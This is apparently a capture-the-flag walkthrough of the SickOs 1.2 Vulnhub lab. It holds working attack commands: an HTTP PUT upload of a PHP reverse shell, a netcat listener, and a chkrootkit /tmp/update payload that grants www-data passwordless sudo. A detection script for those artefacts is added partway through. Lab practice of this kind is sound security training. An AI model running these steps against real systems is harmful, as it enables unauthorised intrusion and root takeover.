SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Let's do a detailed scan now.

root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

But there is a page at /test.

Let's use curl with an OPTIONS request to check which HTTP methods are allowed.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Let's try uploading a PHP shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Let's download it and PUT it to the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener on our machine.

nc -nlvp 5555

And upload it to the server.

curl -v --http1.0 --upload-file shell.php --url http://192.168.18.90/test/shell.php

Now try to access it on the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110) 

Looks like a firewall problem. Let's try port 443. Edit the file and re-upload it to the target.

We got a connection from the server. Great.

Let's now try to escalate privileges.

First, get a TTY shell with the following command.

python -c 'import pty;pty.spawn("/bin/bash")'

Let's have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job for chkrootkit, and there is a known vulnerability in chkrootkit here.

https://www.exploit-db.com/exploits/33899

chkrootkit will execute any file placed at /tmp/update with root privileges.

Let's create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here the cron job runs daily, so we need to wait until the next time it runs. Use this command to check whether the file has been updated.

ls -la /etc/sudoers

After a few minutes, the /etc/sudoers file was updated.
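The two things this step leaves on the host are the appended NOPASSWD line in /etc/sudoers and an executable /tmp/update waiting for the chkrootkit cron run. The following host-audit script is an added example (not part of the original walkthrough) that flags both; the root-only allow-list and the /tmp path are assumptions.

```python
"""Host audit for the two artefacts the steps above leave behind: a NOPASSWD grant appended
to /etc/sudoers and an executable /tmp/update planted for the chkrootkit cron job."""
import re
from pathlib import Path

# Accounts that may legitimately hold NOPASSWD sudo on this host (assumed allow-list).
ALLOWED_NOPASSWD = {"root"}

# Matches "<user> <host>=... NOPASSWD:" lines such as the one appended via /tmp/update.
NOPASSWD_RE = re.compile(r"^(?P<who>\S+)\s+\S+\s*=.*NOPASSWD:", re.IGNORECASE)

# Constructed sample: a stock Ubuntu sudoers plus the line the walkthrough appends.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD: ALL
"""

def suspicious_sudoers_entries(text, allowed=ALLOWED_NOPASSWD):
    """Return (line_no, line) for NOPASSWD grants to principals outside the allow-list."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = NOPASSWD_RE.match(line)
        if m and m.group("who") not in allowed:
            findings.append((no, line))
    return findings

def sudoers_mode_ok(path):
    """sudoers must stay mode 0440; the chmod 777 used above changes it, even if briefly."""
    return (Path(path).stat().st_mode & 0o777) == 0o440

def chkrootkit_bait_present(tmp_dir="/tmp"):
    """True if <tmp_dir>/update exists and is executable: chkrootkit's cron run would execute it as root."""
    bait = Path(tmp_dir) / "update"
    return bait.is_file() and bool(bait.stat().st_mode & 0o111)

if __name__ == "__main__":
    sudoers = Path("/etc/sudoers")
    if sudoers.exists():  # readable only as root
        for no, line in suspicious_sudoers_entries(sudoers.read_text()):
            print(f"/etc/sudoers:{no}: unexpected NOPASSWD grant: {line}")
        if not sudoers_mode_ok(sudoers):
            print("/etc/sudoers: mode is not 0440")
    if chkrootkit_bait_present():
        print("/tmp/update is executable: possible chkrootkit privilege-escalation bait")
```

Run it as root from a cron or configuration-management check; on this box it would report line 4 of the sample and the executable /tmp/update.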

Now check our privileges.

We are root now. Let's find the flag.

SickOS 1.2 conquered! Next day, next machine!